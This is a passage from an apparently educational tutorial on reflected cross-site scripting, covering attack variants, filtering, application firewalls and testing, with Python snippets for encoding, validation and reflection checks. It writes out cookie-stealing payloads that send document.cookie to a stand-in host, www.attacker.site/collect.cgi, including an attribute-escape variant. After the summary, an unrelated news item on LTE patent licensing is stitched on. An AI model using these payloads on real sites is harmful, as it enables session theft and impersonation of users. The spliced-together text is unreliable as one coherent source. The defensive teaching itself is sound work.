The browser, immediately upon loading this page, would execute the embedded JavaScript and send a request to the collect.cgi script in www.attacker.site, with the value of the cookies of www.vulnerable.site that the browser already has. This compromises the cookies of www.vulnerable.site that the client has. It allows the attacker to impersonate the victim. The privacy of the client is completely breached.
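The malicious link writes the plus sign as %2B, while the response page shows a plain +. A plausible reason, assuming welcome.cgi decodes its query string the way HTML form data is conventionally decoded, is that a literal + in the link would be turned into a space before it reached the page. Python's standard urllib.parse module shows the difference:

```python
from urllib.parse import unquote_plus

# Form-style decoding treats '+' as an encoded space, so a literal plus sign
# in the payload would be lost; '%2B' survives decoding as a real '+'.
with_literal_plus = unquote_plus('cookie="+document.cookie')
with_encoded_plus = unquote_plus('cookie="%2Bdocument.cookie')

print(with_literal_plus)  # cookie=" document.cookie
print(with_encoded_plus)  # cookie="+document.cookie
```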
Note:
Causing the JavaScript pop-up window to emerge usually suffices to demonstrate that a site is vulnerable to an XSS attack. If the JavaScript alert function can be called, there is usually no reason for the window.open call not to succeed. That is why most examples of XSS attacks use the alert function, which makes success very easy to detect.
Scope and feasibility
The attack can take place only at the victim’s browser, the same one used to access the site (www.vulnerable.site). The attacker needs to force the client to access the malicious link. This can happen in these ways:
* The attacker sends an e-mail message containing an HTML page that forces the browser to access the link. This requires the victim to use an HTML-enabled e-mail client whose HTML viewer is the same browser that is used for accessing www.vulnerable.site.
* The client visits a site, perhaps operated by the attacker, where a link to an image or otherwise-active HTML forces the browser to access the link. Again, it is mandatory that the same browser be used for accessing both this site and www.vulnerable.site.
The malicious JavaScript can access any of this information:
* Permanent cookies (of www.vulnerable.site) maintained by the browser
* RAM cookies (of www.vulnerable.site) maintained by this instance of the browser, only when it is currently browsing www.vulnerable.site
* Names of other windows opened for www.vulnerable.site
* Any information that is accessible through the current DOM (form values, HTML code, and so forth)
Identification, authentication, and authorization tokens are usually maintained as cookies. If these cookies are permanent, the victim is vulnerable to the attack even when not using the browser at the moment to access www.vulnerable.site. If, however, the cookies are temporary, such as RAM cookies, then the client must be in session with www.vulnerable.site.
Another possible implementation for an identification token is a URL parameter. In such cases, it is possible to access other windows by using JavaScript in this way (assuming that the name of the window showing the page with the necessary URL parameters is foobar):
<script>var victim_window=open('','foobar');alert('Can access: '+victim_window.location.search)</script>
Variations on this theme
It is possible to use many HTML tags besides <SCRIPT> to run the JavaScript. In fact, it is also possible for the malicious JavaScript code to reside on another server and to force the client to download the script and execute it, which can be useful if a lot of code is to be run or when the code contains special characters.
A couple of variations on these possibilities:
* Rather than <script>…</script>, hackers can use <img src="javascript:…">. This works against sites that filter only the <script> HTML tag.
* Rather than <script>…</script>, it is possible to use <script src="http://…">. This is useful when the JavaScript code is too long or when it contains forbidden characters.
Sometimes, the data embedded in the response page is found in non-free HTML context. In this case, it is first necessary to "escape" to the free context, and then to append the XSS attack. For example, if the data is injected as a default value of an HTML form field:
…
<input type=text name=user value="…">
…
Then it is necessary to include "> at the beginning of the data to ensure escaping to the free HTML context. The data would be:
"><script>window.open("http://www.attacker.site/collect.cgi?cookie="+document.cookie)</script>
And the resulting HTML would be:
…
<input type=text name=user value=""><script>window.open("http://www.attacker.site/collect.cgi?cookie="+document.cookie)</script>">
…
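The escape from the attribute depends on the double quote reaching the page unencoded. The sketch below, which is an illustration and not code from the application under discussion, builds the form field twice: once by naive string interpolation, and once with Python's standard html.escape, which encodes the quote along with the angle brackets.

```python
import html

payload = (
    '"><script>window.open("http://www.attacker.site/collect.cgi?cookie="'
    "+document.cookie)</script>"
)

# Naive interpolation: the leading "> closes the attribute and the tag.
naive = f'<input type=text name=user value="{payload}">'

# Encoded output: html.escape with quote=True also encodes the double quote,
# so the data stays inside value="..." and is displayed rather than executed.
encoded = f'<input type=text name=user value="{html.escape(payload, quote=True)}">'

print(naive)
print(encoded)
```

In the encoded version the only literal double quotes left are the two that delimit the attribute, so the data can no longer reach the free HTML context.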
Other ways to perform traditional XSS attacks
So far, we have seen that an XSS attack can take place in a parameter of a GET request that is echoed back to the response by a script. But it is also possible to carry out the attack with a POST request or by using the path component of the HTTP request — and even by using some HTTP headers (such as the Referer).
In particular, the path component is useful when an error page returns the erroneous path. In this case, including the malicious script in the path will often execute it. Many Web servers have been found vulnerable to this attack.
What went wrong?
It is important to understand that, although the Web site is not directly affected by this attack (it continues to function normally, malicious code is not executed on the site, no DoS condition occurs, and data is not directly manipulated nor read from the site), it is still a flaw in the privacy that the site offers its visitors, or clients. This is just like a site deploying an application with weak security tokens, whereby an attacker can guess the security token of a client and impersonate him or her.
The weak spot in the application is the script that echoes back its parameter, regardless of its value. A good script makes sure that the parameter is of a proper format, contains reasonable characters, and so on. There is usually no good reason for a valid parameter to include HTML tags or JavaScript code, and these should be removed from the parameter before it is embedded in the response or before processing it in the application, to be on the safe side.
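A format check of the kind described above might look like the following sketch. The rule used here (letters, digits, spaces, periods, and hyphens, at most 64 characters) is an assumption chosen for the name parameter of the example; a real application would derive the rule from what each parameter legitimately holds.

```python
import re

# Assumed policy for the 'name' parameter: 1 to 64 letters, digits, spaces,
# periods, or hyphens. Anything else is rejected outright.
NAME_PATTERN = re.compile(r"[A-Za-z0-9 .\-]{1,64}")


def is_valid_name(value: str) -> bool:
    """Return True only if the whole value matches the allowed format."""
    return NAME_PATTERN.fullmatch(value) is not None


print(is_valid_name("Joe Hacker"))
print(is_valid_name("<script>alert(document.cookie)</script>"))
```

Accepting only a known-good format is simpler to reason about than trying to list every dangerous tag, because anything unexpected is refused by default.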
How to secure a site against XSS attacks
It is possible to secure a site against an XSS attack in three ways:
1. By performing in-house input filtering (sometimes called input sanitation). For each user input (be it a parameter or an HTTP header) in each script written in-house, advanced filtering against HTML tags, including JavaScript code, should be applied. For example, the welcome.cgi script from the previous case study should filter the <script> tag after it has finished decoding the name parameter. This method has some severe downsides, though:
* It requires the application programmer to be well-versed in security.
* It requires the programmer to cover all possible input sources (query parameters, body parameters of POST requests, HTTP headers).
* It cannot defend against vulnerabilities in third-party scripts or servers. For example, it won’t defend against problems in error pages in Web servers (which display the path of the resource).
2. By performing "output filtering," that is, filtering the user data when it is sent back to the browser, rather than when it is received by a script. A good example for this would be a script that inserts the input data to a database and then presents it. In this case, it is important not to apply the filter to the original input string, but only to the output version. The drawbacks are similar to the ones for input filtering.
3. By installing a third-party application firewall, which intercepts XSS attacks before they reach the Web server and the vulnerable scripts, and blocks them. Application firewalls can cover all input methods in a generic way (including path and HTTP headers), regardless of the script or path from the in-house application, a third-party script, or a script describing no resource at all (for example, one designed to provoke a 404 page response from the server). For each input source, the application firewall inspects the data against various HTML tag patterns and JavaScript patterns. If any match, the request is rejected, and the malicious input does not arrive at the server.
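The generic inspection described in the third approach can be pictured with a deliberately small sketch. The two patterns and the function names is_suspicious and should_reject are assumptions for illustration; they do not represent the rule set or interface of any actual application firewall product.

```python
import re
from urllib.parse import unquote_plus

# Illustrative patterns only; a real rule set would be far larger.
SUSPICIOUS_PATTERNS = [
    re.compile(r"<[a-z!/?]", re.IGNORECASE),       # start of an HTML tag
    re.compile(r"javascript\s*:", re.IGNORECASE),  # javascript: URLs
]


def is_suspicious(raw: str) -> bool:
    """URL-decode one input value and test it against every pattern."""
    decoded = unquote_plus(raw)
    return any(p.search(decoded) for p in SUSPICIOUS_PATTERNS)


def should_reject(path: str, query: str, headers: dict) -> bool:
    """Inspect every input source: path, query string, and header values."""
    sources = [path, query, *headers.values()]
    return any(is_suspicious(s) for s in sources)


print(should_reject("/welcome.cgi", "name=Joe%20Hacker", {"Host": "www.vulnerable.site"}))
print(should_reject("/welcome.cgi", "name=%3Cscript%3Ealert(document.cookie)%3C/script%3E", {}))
```

Because the check runs on the path and the headers as well as the parameters, it also covers requests that match no script at all, such as one crafted to provoke an error page.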
Ways to check whether your site is protected from XSS
Checking that a site is secure from XSS attacks is the logical conclusion of securing the site. Just like securing a site against XSS, checking that the site is indeed secure can be done manually (the hard way) or by using an automated Web application vulnerability-assessment tool, which offloads the burden of checking. The tool crawls the site and then launches all the variants that it knows against all of the scripts that it found by trying the parameters, the headers, and the paths. In both methods, each input to the application (parameters of all scripts, HTTP headers, path) is checked with as many variations as possible, and if the response page contains the JavaScript code in a context where the browser can execute it, then an XSS vulnerability is exposed. For example, sending this text:
<script>alert(document.cookie)</script>
to each parameter of each script through a JavaScript-enabled browser reveals an XSS vulnerability of the simplest kind: the browser pops up the JavaScript alert window if the text is interpreted as JavaScript code. Of course, there are several variants; therefore, testing only that variant is insufficient. And, as you already learned, it is possible to inject JavaScript into various fields of the request: the parameters, the HTTP headers, and the path. However, in some cases (notably the HTTP Referer header), it is awkward to carry out the attack by using a browser.
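The per-parameter check can be sketched in a few lines. To keep the example self-contained, a plain Python function stands in for the HTTP round trip; find_reflecting_params and demo_handler are hypothetical names, and a real assessment tool would send actual requests, try many payload variants, and also cover headers and paths.

```python
import html
from typing import Callable, Dict, List

PROBE = "<script>alert(document.cookie)</script>"


def find_reflecting_params(
    handler: Callable[[Dict[str, str]], str], param_names: List[str]
) -> List[str]:
    """Return the parameters whose probe value comes back in the page unmodified."""
    reflecting = []
    for target in param_names:
        # Harmless filler for every parameter except the one under test.
        params = {name: "test" for name in param_names}
        params[target] = PROBE
        if PROBE in handler(params):
            reflecting.append(target)
    return reflecting


def demo_handler(params: Dict[str, str]) -> str:
    """Hypothetical page: echoes 'name' raw but encodes 'city'."""
    return f"Hi {params['name']} from {html.escape(params['city'])} <BR>"


print(find_reflecting_params(demo_handler, ["name", "city"]))  # ['name']
```

Finding the probe verbatim in the response is only a first indicator; whether the browser would execute it still depends on the context in which it appears.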
Summary
Cross-site scripting is one of the most common application-level attacks that hackers use to sneak into Web applications, as well as one of the most dangerous. It is an attack on the privacy of clients of a particular Web site, which can lead to a total breach of security when customer details are stolen or manipulated. Unfortunately, as this article explains, this is often done without the knowledge of either the client or the organization being attacked.
To keep Web sites from being vulnerable to these malicious acts, it is critical that an organization implement both an online and an offline security strategy. This includes using an automated vulnerability-assessment tool that can test for all of the common Web vulnerabilities and application-specific vulnerabilities (such as cross-site scripting) on a site. For a full online defense, it is also vital to install an application firewall that can detect and defend against any type of manipulation of the code and content sitting on and behind the Web servers.
Long-Term Evolution (LTE) is one step closer to industry-wide stability. 3GPP LTE technology (LTE is the name given to a project within the Third Generation Partnership Project) offers wireless broadband with download speeds around 100 Mbps and upload speeds of 50 Mbps. Seven telecommunication companies have reached an agreement on a framework for licensing intellectual-property rights that relate to LTE. This agreement will make the transition to LTE easier because the fear of lawsuits will be reduced.
Alcatel-Lucent, Ericsson, NEC, NextWave Wireless, Nokia, Nokia Siemens Networks and Sony Ericsson have agreed to an industry standard being called FRAND, which stands for Fair, Reasonable And Non-Discriminatory licensing terms. Notebook computers that use LTE will pay a combined maximum royalty in the single digits. Handsets will pay a single-digit royalty that is based on a percentage of the sales price of the device.
Ericsson Senior Vice President and CTO Hakan Eriksson said this agreement will “reassure operators of the early widespread adoption of LTE technology throughout the consumer electronics industry.”
Industry giant Qualcomm has yet to sign onto the FRAND framework. Other companies like Verizon Wireless, China Mobile, Vodafone and NTT DoCoMo are working on their own versions of LTE.
The future may not be here yet but it could be by next year. Wireless high-speed access will go a long way to promoting services like high-resolution video streaming and innovative online games that can be accessed almost anywhere at any time.